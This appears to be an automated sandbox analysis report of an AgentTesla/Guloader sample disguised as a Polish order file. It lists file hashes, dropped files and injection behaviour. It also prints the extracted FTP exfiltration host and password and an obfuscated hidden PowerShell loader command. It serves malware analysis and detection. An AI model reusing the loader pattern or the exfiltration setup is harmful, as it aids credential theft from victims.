Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
07/12/2023, 07:38
Static task
static1
Behavioral task
behavioral1
Sample
Zamówienie.ZD33166.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Zamówienie.ZD33166.exe
Resource
win10v2004-20231130-en
General
-
Target
Zamówienie.ZD33166.exe
-
Size
698KB
-
MD5
16d009c42496db59b33e6723f913d0c9
-
SHA1
bed0f6cf09e6bc16190e694d493f891732816e8d
-
SHA256
d6d400c0847a1893dea669a1c8cfee475cafd9439bc50c694eaccbc04211a0e7
-
SHA512
02853827c4d99c441c1daf2d22d0da23f42115e7da66396dc9794017322502aee37d2573acc9bf0c3ec300db6697b49ffd3568d1a8544c39973c613daa7f64e3
-
SSDEEP
12288:UwFGHEN1Sn2VNDyu0AP/0wGc/fMz3rzNI3ylgimtdYM3O0V7bby:U5HEN16kh01w3sZlgZtub0V7q
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.omamontaggi.it - Port:
21 - Username:
[email protected] - Password:
pass@A12345@
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini Zamówienie.ZD33166.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 540 msbuild.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1532 powershell.exe 540 msbuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1532 set thread context of 540 1532 powershell.exe 31 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\cockling.lnk Zamówienie.ZD33166.exe File opened for modification C:\Program Files (x86)\Kldebonnets.kod Zamówienie.ZD33166.exe File opened for modification C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski Zamówienie.ZD33166.exe File created C:\Program Files (x86)\cockling.lnk Zamówienie.ZD33166.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\bagvognen.lnk Zamówienie.ZD33166.exe File created C:\Windows\bagvognen.lnk Zamówienie.ZD33166.exe File opened for modification C:\Windows\Calottes.Doo Zamówienie.ZD33166.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 540 msbuild.exe 540 msbuild.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 540 msbuild.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1920 wrote to memory of 1532 1920 Zamówienie.ZD33166.exe 28 PID 1920 wrote to memory of 1532 1920 Zamówienie.ZD33166.exe 28 PID 1920 wrote to memory of 1532 1920 Zamówienie.ZD33166.exe 28 PID 1920 wrote to memory of 1532 1920 Zamówienie.ZD33166.exe 28 PID 1532 wrote to memory of 540 1532 powershell.exe 31 PID 1532 wrote to memory of 540 1532 powershell.exe 31 PID 1532 wrote to memory of 540 1532 powershell.exe 31 PID 1532 wrote to memory of 540 1532 powershell.exe 31 PID 1532 wrote to memory of 540 1532 powershell.exe 31 PID 1532 wrote to memory of 540 1532 powershell.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe"C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Tiljublingens=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill';$Konferenserne=$Tiljublingens.SubString(48125,3);.$Konferenserne($Tiljublingens)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c5a1570c3b773f69397de0b843e1c781
SHA1c6ce2709586af492fe32b91919d00be2ffcb4574
SHA25666e6b721e0ea2fe25d581143f3e958233a7d4ad8c64d51580874653878890008
SHA512a8f8974e9e76baba3eaa825866bf1fa91e05b7ee9a192aa07ec5de9605b6947673ecdae9a3e56783df0ae443b40a30544a12fc35f92b68eb55a7ed9a29e14144
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5ee8a161b30040c3ce20f54aa9863151c
SHA1baea9880b7df6a1900ac891a3515a5bcbd1d1276
SHA25687bbc960b91830e72ac56631b99be82960c7f9ec3bd35bf666cd81857d2640dc
SHA51278c114c0f9f095a0d9adfc0261fbbab185ef587d0664d801f4d952f09cfbebd99d02de3b4f7c10d709c860ec0a8e844c1c983eaed75002a364f81ade994fefad
-
Filesize
32B
MD5a8ca1db6ae34f5e5c152094f44f92476
SHA19fe0fd4e6907c4f9099d2533c3bade4ffa0968e7
SHA2561f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3
SHA512e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
47KB
MD5fa2b04b706a4a1a50a3866e1fffb34f7
SHA10bf99926ab1aff752fd2325d7dadcf68440cda83
SHA256d16797d1615df0383dab78a1e90f594439ae34c0f0cc9083e5883f42585718c5
SHA51258097ca7d6c8145504b41807f2e0aa4b41aa4d5e58943d47455c7e60a5bc4288756503d5a93e3c2c362c5c5aa0c782af3cf30a6a10e206d498eed7e7ae993263
-
Filesize
301KB
MD5a7d050056af386ff8097a7effd1d9f6f
SHA1008fafc028955c2bdab6508168135e42b1c2d437
SHA2565270d655c8baee63673cce7a5d4c4bd8130d37dcc5a0688d5589913b96cc6d95
SHA5127413802fcf4e35e690adef8718dfad2fc73848a3f5e9ea7bc9636795dce7cba8bf28022d28e9323041e2210a2ab413f48d1a990f2bb7b40bf42602b28788870d